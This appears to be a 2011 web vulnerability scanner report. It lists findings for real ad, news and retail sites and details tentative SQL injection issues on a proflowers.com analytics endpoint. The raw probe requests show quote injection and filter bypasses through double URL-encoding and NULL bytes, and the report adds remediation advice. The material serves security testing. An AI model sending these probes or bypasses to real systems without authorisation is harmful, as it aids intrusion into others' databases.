19.29. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP

19.30. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW

19.31. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG

19.32. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW

19.33. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL

19.34. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL

19.35. http://www.personalcreations.com/radioDefault.aspx

19.36. http://www.personalcreations.com/sitemap.aspx

19.37. http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904

19.38. http://www.reuters.com/assets/commentsChild

19.39. http://www.reuters.com/assets/newsFlash

19.40. http://www.sacbee.com/notfound/

19.41. http://www.scribd.com/embeds/63688924/content

19.42. http://www.scribd.com/embeds/63688924/content_inner

19.43. http://www.sprint.com/index_c.html

19.44. https://www.sprint.net/performance/

19.45. http://www.und.com/sports/m-footbl/9873956

19.46. http://www.und.com/sports/m-footbl/9874134

19.47. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

19.48. http://www.youtube.com/embed/xXftjfC3b5o

20. TRACE method is enabled

20.1. http://bh.contextweb.com/

20.2. http://blogs.sacbee.com/

20.3. http://community.sprint.com/

20.4. http://image2.pubmatic.com/

20.5. http://imp.fetchback.com/

20.6. http://log.c12s.com/

20.7. http://m.xp1.ru4.com/

20.8. http://mi.adinterax.com/

20.9. http://optimized-by.rubiconproject.com/

20.10. http://r.openx.net/

20.11. http://rt.legolas-media.com/

20.12. http://sales.reuters.com/

20.13. http://tacoda.at.atwola.com/

20.14. http://www.sprint.com/

20.15. https://www.sprint.net/

21. Email addresses disclosed

21.1. http://ads.adbrite.com/adserver/vdi/742697

21.2. http://blogs.sacbee.com/the_state_worker/

21.3. http://media.sacbee.com/static/styles/blog_styles.css

21.4. http://s.meebocdn.net/cim/script/cim_v92_cim_11_12_4.en.js

21.5. http://www.google.com/uds/Gfeeds

21.6. http://www.google.com/uds/Gfeeds

21.7. http://www.personalcreations.com/CustomerService-ContactUs.aspx

21.8. http://www.sacbee.com/notfound/

22. Private IP addresses disclosed

22.1. http://www.facebook.com/extern/login_status.php

22.2. http://www.facebook.com/extern/login_status.php

22.3. http://www.facebook.com/plugins/like.php

22.4. http://www.facebook.com/plugins/like.php

22.5. http://www.facebook.com/plugins/likebox.php

23. Robots.txt file

23.1. http://ad.afy11.net/ad

23.2. http://ad.turn.com/server/ads.js

23.3. http://ad.yieldmanager.com/pixel

23.4. http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62

23.5. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

23.6. http://b.scorecardresearch.com/b

23.7. http://c.betrad.com/surly.js

23.8. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

23.9. http://cdn.gigya.com/js/socialize.js

23.10. http://cdn.optmd.com/V2/89733/235451/index.html

23.11. http://cdn.turn.com/server/ddc.htm

23.12. http://ce.lijit.com/merge

23.13. http://cim.meebo.com/cim

23.14. http://cm.npc-mcclatchy.overture.com/js_1_0/

23.15. http://community.sprint.com/baw/index.jspa

23.16. http://content.usatoday.com/communities/campusrivalry/topics

23.17. http://fonts1.scribdassets.com/static/4gen.css

23.18. http://fonts2.scribdassets.com/static/4gen_ie.css

23.19. http://fonts4.scribdassets.com/static/4gen.js

23.20. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

23.21. http://get.lingospot.com/arc/stay/

23.22. http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

23.23. http://i.casalemedia.com/imp.gif

23.24. http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf

23.25. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

23.26. http://imp.fetchback.com/serve/fb/adtag.js

23.27. http://jlinks.industrybrains.com/jsct

23.28. http://l.addthiscdn.com/live/t00/250lo.gif

23.29. http://m.xp1.ru4.com/activity

23.30. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s87897360916249

23.31. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794

23.32. http://pixel.mathtag.com/sync

23.33. http://pixel.quantserve.com/pixel

23.34. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

23.35. http://r.casalemedia.com/rum

23.36. http://r.turn.com/r/beacon

23.37. http://rt.legolas-media.com/lgrt

23.38. http://s0.2mdn.net/2179194/HYSA_BLACK_RATE_300x250_40k.swf

23.39. http://s6.scribdassets.com/aggregated/css/base.css

23.40. http://s7.scribdassets.com/aggregated/css/web.css

23.41. http://sales.reuters.com/pitches/roughcuts/rc728x90.swf

23.42. http://static.lingospot.com/js/all.js

23.43. http://sync.mathtag.com/sync

23.44. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee

23.45. http://tcr.tynt.com/javascripts/Tracer.js

23.46. http://trc.taboolasyndication.com/reuters/trc/2/json

23.47. http://turn.nexac.com/r/pu

23.48. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s84327528064604

23.49. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401

23.50. http://www.bizographics.com/collect/

23.51. http://www.facebook.com/plugins/like.php

23.52. http://www.google-analytics.com/__utm.gif

23.53. http://www.googleadservices.com/pagead/conversion/1031221371/

23.54. http://www.linkedin.com/analytics/

23.55. https://www.linkedin.com/secure/login

23.56. http://www.meebo.com/cim/sandbox.php

23.57. http://www.personalcreations.com/

23.58. http://www.publish2.com/newsgroups/state-worker.js

23.59. http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904

23.60. http://www.sacbee.com/notfound

23.61. http://www.scribd.com/embeds/63688924/content

23.62. http://www.sprint.com/index_c.html

23.63. https://www.sprint.net/performance

23.64. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

23.65. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

23.66. http://www.youtube.com/embed/xXftjfC3b5o

24. Cacheable HTTPS response

24.1. https://socialize.gigya.com/gs/bookmark.aspx

24.2. https://sprintlb.ehosts.net/narouter/eQueueCheck.aspx

24.3. https://www.sprint.net/performance/

24.4. https://www.sprint.net/performance/gen_line_xml.php

24.5. https://www.sprint.net/performance/gen_pop_xml.php

25. HTML does not specify charset

25.1. http://a1128.g.akamai.net/favicon.ico

25.2. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10

25.3. http://ad.doubleclick.net/adj/sacbee_cim/

25.4. http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics

25.5. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

25.6. http://ds.addthis.com/red/psi/sites/content.usatoday.com/p.json

25.7. http://graphics.cstv.com/store/.gif

25.8. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

25.9. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

25.10. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

25.11. http://view.atdmt.com/SPT/iview/194719689/direct/01

25.12. http://view.atdmt.com/SPT/iview/194719690/direct/01

25.13. http://view.atdmt.com/SPT/iview/194719691/direct/01

25.14. http://view.atdmt.com/SPT/iview/194719692/direct/01

25.15. http://view.atdmt.com/SPT/iview/194719693/direct/01

25.16. http://view.atdmt.com/SPT/iview/194719989/direct/01

25.17. http://view.atdmt.com/SPT/iview/194719990/direct/01

25.18. http://view.atdmt.com/SPT/iview/194719991/direct/01

25.19. http://view.atdmt.com/SPT/iview/194719992/direct/01

25.20. http://view.atdmt.com/SPT/iview/194719993/direct/01

25.21. http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1

25.22. http://w55c.net/ct/cms-2-frame.html

25.23. https://www.sprint.net/performance/gen_line_xml.php

25.24. https://www.sprint.net/performance/gen_pop_xml.php

25.25. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

26. Content type incorrectly stated

26.1. http://ad.doubleclick.net/adj/sacbee_cim/

26.2. http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics

26.3. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

26.4. http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

26.5. http://imp.fetchback.com/serve/fb/adtag.js

26.6. http://js.www.reuters.com/recommend/re/fp

26.7. http://rma-api.gravity.com/v1/beacons/initialize

26.8. http://rt.disqus.com/forums/realtime-cached.js

26.9. http://rt.legolas-media.com/lgrt

26.10. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

26.11. http://trc.taboolasyndication.com/reuters/trc/2/json

26.12. http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1

26.13. http://www.facebook.com/extern/login_status.php

26.14. http://www.reuters.com/assets/breakingNews

26.15. http://www.reuters.com/assets/info

26.16. http://www.reuters.com/assets/searchIntercept

26.17. https://www.sprint.net/performance/gen_line_xml.php

26.18. https://www.sprint.net/performance/gen_pop_xml.php

27. Content type is not specified

27.1. http://rma-api.gravity.com/favicon.ico

27.2. http://www.meebo.com/cmd/btproviders

27.3. http://www.meebo.com/cmd/tc



1. SQL injection  next
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401 [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s81099810544401

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/proflodevelopment/1/H.22.1/s81099810544401?AQB=1&pccr=true&vidn=2731657005162764-60000183E0004D48&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A10%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD29&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=70&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb3%3Atpf2%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=54c64013-5ca6-4b8c-981b-97bc288ebb06&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb1%3Antc1%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657005162764-60000183E0004D48[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:05 GMT
Server: Omniture DC/2.0.0
Content-Length: 445
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/proflodevelopment/1/H.22.1/s81099810544401 w
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/proflodevelopment/1/H.22.1/s81099810544401?AQB=1&pccr=true&vidn=2731657005162764-60000183E0004D48&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A10%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD29&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=70&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb3%3Atpf2%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=54c64013-5ca6-4b8c-981b-97bc288ebb06&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb1%3Antc1%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657005162764-60000183E0004D48[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:05 GMT
Server: Omniture DC/2.0.0
xserver: www635
Content-Length: 0
Content-Type: text/html


1.2. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84142070419620 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s84142070419620

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/proflodevelopment/1/H.22.1/s84142070419620?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A20%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD24&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=71&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt1%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb4%3Atpf2%3A%3Atbc1%3Athp2%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=15a5afb5-0d9c-45c7-84a2-3460492ea8f1&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms2%3Atvc1%3A%3A%3A%3A%3Atxb2%3Atxc1%3A%3A%3A%3A%3A%3Atnp2%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-new-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-new-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:20:50 GMT
Server: Omniture DC/2.0.0
Content-Length: 399
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/proflodevelopment/1/H.22.1/s84142070419620?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A20%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD24&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=71&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt1%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb4%3Atpf2%3A%3Atbc1%3Athp2%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=15a5afb5-0d9c-45c7-84a2-3460492ea8f1&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms2%3Atvc1%3A%3A%3A%3A%3Atxb2%3Atxc1%3A%3A%3A%3A%3A%3Atnp2%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-new-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-new-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:20:50 GMT
Server: Omniture DC/2.0.0
xserver: www650
Content-Length: 0
Content-Type: text/html


1.3. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84476320391986 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s84476320391986

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/proflodevelopment/1/H.22.1/s84476320391986?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A15%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD23&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=34&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm1%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=81ea4087-d623-410d-aa84-36102d92184b&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
